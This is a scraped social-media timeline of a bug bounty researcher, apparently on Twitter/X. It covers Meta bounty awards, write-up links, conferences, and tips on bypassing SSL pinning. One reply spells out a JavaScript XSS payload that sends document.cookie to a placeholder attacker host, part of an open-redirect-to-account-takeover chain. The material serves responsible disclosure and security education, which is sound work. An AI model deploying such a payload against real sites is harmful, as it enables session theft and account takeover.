Bassem M bazzoun

A reward of 11,250$ from Facebook after reporting a security vulnerability that could allow me to delete any video or reel posted on the platform. bugreader.com/social/write-u… #cybersecuriy #BugBounty #hackers #penetrationtesting #facebook #meta

@covert_bugs Android mobile app

@bassemmbazzoun 👌🏻👌🏻 did you find the api call via mobile or web app?

In this blog, I will discuss how a security vulnerability I discovered a year ago in Facebook/Meta could be used to affect the US election and how a simple IDOR vulnerability could have a major impact. I hope you enjoy it :) #USElection2024 #bugbounty @bazzounbassem/could-a-simple-idor-vulnerability-in-facebook-affects-the-outcome-of-us-elections-c17bc5e12e30" target="_blank" rel="nofollow noopener">medium.com/@bazzounbassem…

@covert_bugs You may try using older versions that have the "Whitehat Setting" then update the app to latest version. Otherwise, you can find some frida scripts available online on Github to bypass SSL for Instagram.

@bassemmbazzoun Thanks! I know about the whitehat settings in android, however they never appear for the Instagram app. They appear only in the Facebook app. Any suggestions for the insta app?

It was great to attend the Meta Bug Bounty Researchers Conference (BountyCon'24) in Johannesburg, South Africa 🇿🇦👨🏻‍💻. I had the opportunity to meet and network with greatest hackers, learn new topics, and connect with the Meta Security team. #meta #cybersecurity #bugbountytips

@covert_bugs I hunt on Android devices; There is a researcher setting that can help you intercept the Facebook mobile requests. For iOS, you can find some GitHub repositories that contain Frida scripts to bypass SSL. Try searching "Facebook SSL Bypass iOS - GitHub" and check that suit you.

@bassemmbazzoun Can you please share some guide or resource that can help in bypassing ssl pinning of fb and insta on ios device. Have read your write ups on bugreader, seen that you have been testing on ios apps as well.

#GISEC #bugbounty #cybersecurity

@blackcloudes @_SaudSubaie الإجابة على هذا السؤال قد تكون طويلة لأنها موضوع واسع يحتاج إلى شرح مفصل، ولكن بشكل عام، يرتبط هذا بالقرصنة الأخلاقية وصيد الثغرات الأمنية وبرامج ال (Bug bounty). أقوم بفحص المواقع وأحاول العثور على ثغرات أمنية ومن ثم أقوم بالإبلاغ عنها للشركة.

شخص اسمه باسم كتب مقالة مميزة عن ابلاغه لثغرة خطيرة في انستقرام "Meta" وحصل على مكافأة قدرها 94 ألف ريال سعودي. وتم تكريمه في مؤتمر Meta في كوريا الجنوبية. الثغرة عبارة عن 2FA bypass سرد مميز وشرح بالتفصيل كيف وجد الثغرة وكيفية استغلالها مع صور مرفقه. قراءة ممتعة:- @bazzounbassem/bypass-two-factor-authentication-of-facebook-accounts-25-300-7ae152d7836a" target="_blank" rel="nofollow noopener">medium.com/@bazzounbassem…

@_SaudSubaie شكرا على النشر 🙏🏻😄

I'm excited to speak at GISEC Global, Middle East and Africa's Largest Cybersecurity event - from 23-25 April 2024 at Dubai World Trade Centre. Come and join me, register now for a free pass: lnkd.in/d4JXxY6F #GISECGLOBAL #cybersecurity #infosecurity #ethicalhacking

@L3onid1s Well done! 👏🏻👏🏻

@bassemmbazzoun Just got a bounty for a Open redirect to XSS like this today 🤜🏻🤛🏻

Found an endpoint: …/redacted?redirectionParam=/Path 1. Supplied any url: (Open redirect ✅ ) 2.Supplied javascript:alert(1) ( XSS ✅ ) 3.Created payload to steal the victim’s cookies and redirect them to our own website: ( ATO ✅ ) #BugBounty #bugbountytips #hackerone

@m4ngofloat_ Above is a simple payload that retrieve the cookies using document.cookie then redirect the victim to our own website and appends the cookies to the URL. Then you can check the logs on your website and retrieve the victim cookies.

@m4ngofloat_ You may write your own JS payload that steal the victim cookies and redirect it to your own server. E.g: javascript:(function() { var data = encodeURIComponent(document.cookie); window.location.href = "https://{INTERACTSH_LINK}/attacker?cookies="%2bdata; })();

This is how I was able to leak the cover pages of secret documents that were supposed to be private🔥. Check out my write-up below. I'd love to hear your thoughts and feedback. #hackerone #Cybersecurity #ethicalhacking #cyberattacks #bugbounty @daoudgiwa/revealing-hidden-gems-sneak-peek-into-offline-publication-secrets-b67ef884391b" target="_blank" rel="nofollow noopener">medium.com/@daoudgiwa/rev…

Yay, I was awarded a $3,750 bounty on @Hacker0x01! hackerone.com/bassembazzoun #TogetherWeHitHarder #bugbounty #CyberSecurity #hackerone

Bypass email confirmation on Instagram and Facebook — Meta Bug Bounty [$5000] @kassembazzoun/confirm-any-email-on-instagram-and-facebook-meta-bug-bounty-5000-e3b05cccb4b6" target="_blank" rel="nofollow noopener">medium.com/@kassembazzoun…

@VikasBerwal1337 They missed to implement rate limit

@bassemmbazzoun how did you manage to bypass the rate limit for brute-force?

Bypassing Two-Factor Authentication for Facebook Accounts ($25,300) #bugbounty #bugbountytips #cybersecurity #hackerone #ethicalhacking #vulnerability #facebook #meta #instagram #networksecurity #programming #cybersec #infosec @bazzounbassem/bypass-two-factor-authentication-of-facebook-accounts-25-300-7ae152d7836a" target="_blank" rel="nofollow noopener">medium.com/@bazzounbassem…

@reyaz_chawshin Nope, we cannot disclose any vulnerability to the public until it's fully resolved

@bassemmbazzoun This method still working?

For people who were unable to access my write-up on Medium, I have created the article below on Linkedin, and you will be able to read the full write-up. I'm sorry for the inconvenience! I hope you enjoy reading the write-up! linkedin.com/pulse/bypass-t…

Update of the updated link: final_version_999.pdf :') linkedin.com/pulse/bypass-t…

Updated Link: @bazzounbassem/bypass-two-factor-authentication-of-facebook-accounts-25-300-7ae152d7836a" target="_blank" rel="nofollow noopener">web.archive.org/web/2023082117…